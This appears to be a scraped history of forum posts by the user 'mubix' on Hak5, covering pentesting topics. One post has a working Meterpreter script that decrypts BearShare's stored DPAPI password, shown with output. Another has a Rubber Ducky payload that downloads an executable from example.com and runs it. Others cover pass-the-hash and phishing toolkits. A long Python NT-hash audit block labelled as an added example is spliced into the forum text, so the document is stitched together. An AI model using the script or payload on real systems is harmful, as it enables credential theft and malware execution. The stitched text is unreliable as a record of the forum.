mubix
Posts: 516
Days Won: 3
Posts posted by mubix
-
Easiest way is to use Burp proxy to man-in-the-middle all web traffic. Here are some tutorials on how:
http://carnal0wnage.attackresearch.com/2010/11/iphone-burp.html
http://portswigger.net/burp/help/proxy_options_installingcacert.html#iphone
You can check inside SSL with that setup. If it's not web and it's using some other protocol you may be out of luck, but there's a good chance that it's using HTTP or HTTPS.
-
If you still have the ability to log in as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and, once logged in (as the user with BearShare installed), I was still able to decrypt the BearShare password.
-
Ya, it was the password stored in the user's store. Wrote a quick script to decrypt it (mostly stolen from post/windows/gather/credentials/outlook.rb):

# Load crypt32.dll into railgun if it is not already there
def prepare_railgun
  rg = session.railgun
  if (!rg.get_dll('crypt32'))
    rg.add_dll('crypt32')
  end
end

# Copy the DPAPI blob into the meterpreter process and call
# CryptUnprotectData on it; the input DATA_BLOB is {cbData, pbData}
def decrypt_password(data)
  rg = session.railgun
  pid = client.sys.process.getpid
  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
  mem = process.memory.allocate(128)
  process.memory.write(mem, data)
  # Pointer and length widths depend on the process architecture
  if session.sys.process.each_process.find { |i| i["pid"] == pid }["arch"] == "x86"
    addr = [mem].pack("V")
    len = [data.length].pack("V")
    ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
    #print_status("#{ret.inspect}")
    len, addr = ret["pDataOut"].unpack("V2")
  else
    addr = [mem].pack("Q")
    len = [data.length].pack("Q")
    ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
    len, addr = ret["pDataOut"].unpack("Q2")
  end
  return "" if len == 0
  # Read the plaintext back out of the output DATA_BLOB
  decrypted_pw = process.memory.read(addr, len)
  return decrypted_pw
end

# Read a value from the BearShare user key in HKCU
def get_valdata(k, name)
  @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
  registry_getvaldata("#{@key_base}\\#{k}", name)
end

prepare_railgun
data = get_valdata("", 'Password')
print_error data.inspect
password = decrypt_password(data)
print_status password.inspect
And got the following output when logged in as Administrator (who installed BearShare) and with the password of 'password':

meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x00\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"
[*] "password\x00"
I then exported the entire registry tree for BearShare and moved it to a new user 'bob', importing it as it was from Administrator:

meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x00\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"
[*] ""
No joy (as expected)
-
I would like to 2nd that one ;)
-
I would start with SET (Social Engineering Toolkit) and look at how it does things. There is also SEF (Social Engineering Framework), MetaPhish, and Spear Phishing Toolkit. I think there is also one called FBPwn but I think it's just Java Applet + Facebook.
-
Check out the Metasploit 'signed_java_applet' module. Pretty straightforward. After that you can either use Metasploit to host it or pull that Jar file down and host it anywhere you want with the APPLET tag.
-
An easy way is to just put the text file next to the Jar, and specify it that way. So put everything in the same directory. Hold shift and right click so you get the "Open Command Window Here" option. Click it, then just run:
java -jar duckencode.jar -i myevilstuff.txt
-
My personal preference is pfSense. BSD based, fast and easy to use. And I have it running on an embedded system currently so I doubt you'll have any problems running it on anything you want.
-
I recently added a Ducky payload to the page http://www.usbrubber...ll_wget_execute :
Interested in what you guys think.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER
-
Anyone happen to grab the script before it was discontinued that doesn't mind sharing? The video looked pretty awesome of its capabilities.
-
Nice work, but why are you using Metasploit on Windows? Try it out on BackTrack or install it on Ubuntu. You'll get 10x the performance, even in a VM.
-
Hi
I'm using Armitage and Metasploit.
I'm trying to attack a Windows Vista machine at my home. The target machine is mine.
The only machine that I have been able to attack and gain access to is Windows 2000.
So what exploits should I use? Please help me, I'm just trying to learn to use Metasploit.
What is the machine vulnerable to? What patches have been applied? Are you looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.
-
I agree, but it's really hard to fit that into a segment, even 4. People devote days to training even the basics.
-
I have a lot of work to do on camera, and hopefully that is something that I can keep getting better at going forward. That's very cool that you're working in bio exploitation. Which field?
I have a make-up Metasploit segment in the queue; it's really hard to know when you aren't up to par when there's no one to give you instant feedback now that there is no hakhouse...
-
You can use pass-the-hash, where you don't know the password, but you have the hash. Many organizations use the same password for the local admin on all the boxes in an environment, and since an NTLM or LM hash is the same for the same password no matter what box the account is on, that hash can act just like the password.
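The point above, that the NT hash depends only on the password, can be checked directly. The following is an added example and not code from the post: it implements MD4 (which `hashlib` often lacks under OpenSSL 3), derives the NT hash as MD4 over the UTF-16LE password, and then runs a defender-side audit over a constructed local-account inventory to flag any hash that appears on more than one host. Host names, passwords and the inventory shape are all constructed for the example.

```python
# Added example (not from the forum post). Shows that the NT hash is unsalted
# and unbound to the host, and audits an inventory for reuse across hosts.
import struct
from collections import defaultdict


def _lrot(x, n):
    """Rotate a 32-bit value left by n bits."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Plain MD4 (RFC 1320); written out because hashlib.new('md4') is often disabled."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (round function, additive constant, shift table, word order) per round
    rounds = [
        (f, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13],
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15],
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _lrot((a + func(b, c, d) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate the working registers
        a0 = (a0 + a) & 0xFFFFFFFF
        b0 = (b0 + b) & 0xFFFFFFFF
        c0 = (c0 + c) & 0xFFFFFFFF
        d0 = (d0 + d) & 0xFFFFFFFF
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE password. No salt, no host name, no user name."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed inventory (hypothetical hosts and passwords, not real dumps):
# the kind of record a local-account audit would collect per machine.
INVENTORY = [
    {"host": "ws01", "user": "Administrator", "nthash": nt_hash("Winter2012!")},
    {"host": "ws02", "user": "Administrator", "nthash": nt_hash("Winter2012!")},
    {"host": "srv01", "user": "Administrator", "nthash": nt_hash("unique-per-host-1")},
    {"host": "ws03", "user": "Administrator", "nthash": nt_hash("Winter2012!")},
]


def shared_local_admin_hashes(inventory):
    """Return {nthash: sorted hosts} for every hash present on more than one host.

    Because the hash is identical wherever the password is identical, any entry
    returned here is one credential that unlocks every listed host.
    """
    hosts_by_hash = defaultdict(set)
    for rec in inventory:
        hosts_by_hash[rec["nthash"]].add(rec["host"])
    return {h: sorted(hs) for h, hs in hosts_by_hash.items() if len(hs) > 1}


if __name__ == "__main__":
    for h, hosts in shared_local_admin_hashes(INVENTORY).items():
        print(f"hash {h} shared by {len(hosts)} hosts: {', '.join(hosts)}")
```

Because nothing host-specific enters `nt_hash`, the audit needs no passwords at all: identical hashes in the inventory are enough to prove identical local-admin passwords, which is the condition that makes one leaked hash usable everywhere. Per-host randomized local-admin passwords (for example via LAPS) are what make the returned dictionary empty.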
-
How's the project coming along?
-
Here is a quick link to some tutorials on how to progress:
http://www.room362.com/mubixlinks/2009/12/...g-tutorial.html
-
Hahaha shit... Yeah that is from Mubix. Probably the worst guest the show keeps bringing back. Are you fucking kidding me? I assume Mubix is part of a team. I assume they're bringing unpublished she-at to the table, nope. They're just making a tag line to attract hack-forum members.
Thanks for the constructive criticism. What don't you like about it?
-
Geohot recently cracked open the PS3, so I hope a bunch more coding efforts will start to emerge, but as of right now there really isn't much in the way of truly utilizing the CELL processor. Check out some of the PS3 hack pages to try and find some coding suggestions.
-
Hands down the best block list site that I use is:
-
That's an awesome source of lists. Thanks!
-
Check out the following links; this is much easier to configure.
How's your experience been with Iodine? I've found Ozyman a bit more stable, but ya, definitely Iodine is easier.
-
Episode 5x22
in Hak5
I can't believe Mubix was so rude about Mac OS X not being a 'proper platform', it kind of undermined any respect he may have built up in previous episodes, he just sounded like a 14 year old script kid. Mac OS X doesn't allow access to /dev/mem presumably for security reasons.
It was all in fun. I will actually be obtaining my first Mac in the not so distant future. I apologize if my comment offended you or any way hindered your respect for me.
-
ServifyThis
in Hak5
I just saw a post on mubix' blog in which he mentioned ServifyThis (hxxp://www.inguardians.com/pubs/servifythis/). It looks an interesting tool and maybe could be featured in a future episode? I love the tool and I think that's an awesome idea.
Meterpreter - what lasting effect does it have on a system?
in Security
Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced, accessed, or stored (i.e. system profiling software, normal process execution, and hibernate respectively). The more evident parts come in a few flavors:
These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sysinternals Process Monitor on the victim. Make sure Bro, and all the other gadgets and gizmos SecurityOnion has, are enabled and in-line.
I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.